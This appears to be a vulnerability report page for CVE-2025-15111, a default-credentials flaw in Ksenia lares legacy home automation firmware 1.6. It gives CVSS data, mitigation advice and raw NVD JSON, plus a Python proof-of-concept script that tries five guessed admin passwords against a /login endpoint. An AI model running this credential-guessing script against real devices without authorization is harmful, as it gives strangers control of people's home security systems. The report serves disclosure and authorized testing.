Security Vulnerability Report
CVE-2025-15111 CVSS 9.8 CRITICAL

CVE-2025-15111

Published: 2025-12-30 23:15:50
Last Modified: 2026-03-11 20:16:13

Description

Ksenia Security lares (legacy model) version 1.6 contains a default credentials vulnerability that allows unauthorized attackers to gain administrative access. Attackers can exploit the weak default administrative credentials to obtain full control of the home automation system.

CVSS Details

CVSS Score
9.8 (CVSS v3.1 base score; the CNA's CVSS v4.0 vector in the raw JSON below scores 9.3, also CRITICAL)
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:kseniasecurity:lares_firmware:1.6:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:kseniasecurity:lares:4.0:*:*:*:*:*:*:* - NOT VULNERABLE
Ksenia Security lares legacy model < 1.6 (not covered by the NVD CPE match above, which lists only firmware 1.6; treat earlier firmware as unconfirmed rather than clean)
Ksenia Security lares legacy model = 1.6
Note: NVD tags this CVE "unsupported-when-assigned" (see raw JSON), i.e. the legacy model was already out of vendor support when the ID was issued, so no firmware fix should be expected. Mitigate by replacing the default administrative credentials on every unit and keeping the panel's web interface off untrusted networks.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note that the /login endpoint, the credential list and the success check (HTTP 200 plus the word "session" in the body) are generic heuristics, not values taken from the advisory: confirm any reported hit manually, and do not read a miss as proof the device has been reconfigured. Each run submits up to five login attempts, which may trigger account lockout or alerting on the target.
python
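#!/usr/bin/env python3
"""
CVE-2025-15111 PoC - Ksenia Security lares Default Credentials

This PoC demonstrates the default credentials vulnerability (CWE-259) in
Ksenia Security lares, legacy model, firmware 1.6.

WARNING: Only use for authorized security testing.

Read before trusting the output:

* The username/password pairs in DEFAULT_CREDENTIALS are common vendor and
  installer defaults, not values quoted from the advisory.  A miss therefore
  does not prove the device has been reconfigured.
* LOGIN_PATH and login_succeeded() are heuristics (HTTP 200 plus the word
  "session" somewhere in the body).  A login page that merely mentions a
  session, e.g. "session expired", yields a false positive, so confirm any
  reported hit by hand.
* One run submits up to len(DEFAULT_CREDENTIALS) login attempts, which may
  trip lockout or alerting on the target.

Usage:
    poc.py [http://target-ip]
"""
import sys

try:
    import requests
except ImportError:  # the only third-party dependency; reported on first use
    requests = None

# Target configuration.  Either edit TARGET_HOST or pass the base URL as the
# first command-line argument.
TARGET_HOST = "http://target-ip"  # Replace with target IP
LOGIN_PATH = "/login"
LOGIN_ENDPOINT = f"{TARGET_HOST}{LOGIN_PATH}"  # kept for callers that import it

# Common default credentials for Ksenia lares (generic guesses, see the
# module docstring - not values taken from the advisory).
DEFAULT_CREDENTIALS = [
    {"username": "admin", "password": "admin"},
    {"username": "admin", "password": "1234"},
    {"username": "admin", "password": "ksenia"},
    {"username": "installer", "password": "installer"},
    {"username": "user", "password": "user"},
]

# Seconds to wait for each login request before giving up on that pair.
REQUEST_TIMEOUT = 10


def login_endpoint(target_host: str) -> str:
    """Return the login URL for *target_host* (a trailing slash is tolerated)."""
    return f"{target_host.rstrip('/')}{LOGIN_PATH}"


def login_succeeded(status_code: int, body: str) -> bool:
    """Heuristic success check: HTTP 200 and "session" in the response body.

    This is the only evidence the PoC has; it can false-positive on any page
    that mentions a session, so a hit must be verified manually.
    """
    return status_code == 200 and "session" in body.lower()


def parse_target(argv: list[str]) -> str:
    """Return the base URL given as *argv[1]*, or TARGET_HOST when absent."""
    return argv[1] if len(argv) > 1 else TARGET_HOST


def check_default_credentials(target_host: str = TARGET_HOST) -> bool:
    """Try each default credential pair against *target_host*.

    Args:
        target_host: base URL of the panel, e.g. "http://192.0.2.10".

    Returns:
        True on the first pair that passes login_succeeded(); False when no
        pair matched or when no request could be completed at all.

    Raises:
        RuntimeError: if python-requests is not installed.
    """
    if requests is None:
        raise RuntimeError("python-requests is required: pip install requests")

    endpoint = login_endpoint(target_host)
    print(f"[*] Scanning target: {target_host}")

    attempts_completed = 0
    for creds in DEFAULT_CREDENTIALS:
        try:
            response = requests.post(
                endpoint,
                data={"username": creds["username"], "password": creds["password"]},
                timeout=REQUEST_TIMEOUT,
            )
        except requests.exceptions.RequestException as exc:
            # Keep going: one timeout should not mask a later match, but
            # remember that this pair was never actually tested.
            print(f"[-] Error connecting to target: {exc}")
            continue

        attempts_completed += 1
        if login_succeeded(response.status_code, response.text):
            print("[+] SUCCESS! Valid credentials found:")
            print(f"    Username: {creds['username']}")
            print(f"    Password: {creds['password']}")
            return True

    if attempts_completed == 0:
        # Distinguish "unreachable" from "not vulnerable": the old message
        # wrongly implied the defaults had been tested.
        print("[-] Could not complete any login attempt; target not tested")
    else:
        print("[-] No valid default credentials found")
    return False


if __name__ == "__main__":
    check_default_credentials(parse_target(sys.argv))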

References (the advisory URLs are carried in the Raw JSON Data below: Packet Storm, the VulnCheck advisory, Zero Science ZSL-2025-5927 - tagged there as carrying an exploit - and the vendor site)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15111", "sourceIdentifier": "[email protected]", "published": "2025-12-30T23:15:49.557", "lastModified": "2026-03-11T20:16:12.513", "vulnStatus": "Modified", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "Ksenia Security lares (legacy model) version 1.6 contains a default credentials vulnerability that allows unauthorized attackers to gain administrative access. Attackers can exploit the weak default administrative credentials to obtain full control of the home automation system."}, {"lang": "es", "value": "Ksenia Security Lares 4.0 Home Automation versión 1.6 contiene una vulnerabilidad de credenciales por defecto que permite a atacantes no autorizados obtener acceso administrativo. Los atacantes pueden explotar las credenciales administrativas débiles por defecto para obtener control total del sistema de automatización del hogar."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", 
"modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-259"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:kseniasecurity:lares_firmware:1.6:*:*:*:*:*:*:*", "matchCriteriaId": "DF94F084-2F13-427A-9CB5-9E3E95621C8B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:kseniasecurity:lares:4.0:*:*:*:*:*:*:*", 
"matchCriteriaId": "DDE71F37-880F-4534-80FF-A2BE3D8E2AD4"}]}]}], "references": [{"url": "https://packetstorm.news/files/id/190180/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.kseniasecurity.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/ksenia-security-lares-home-automation-default-credentials-vulnerability", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5927.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5927.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}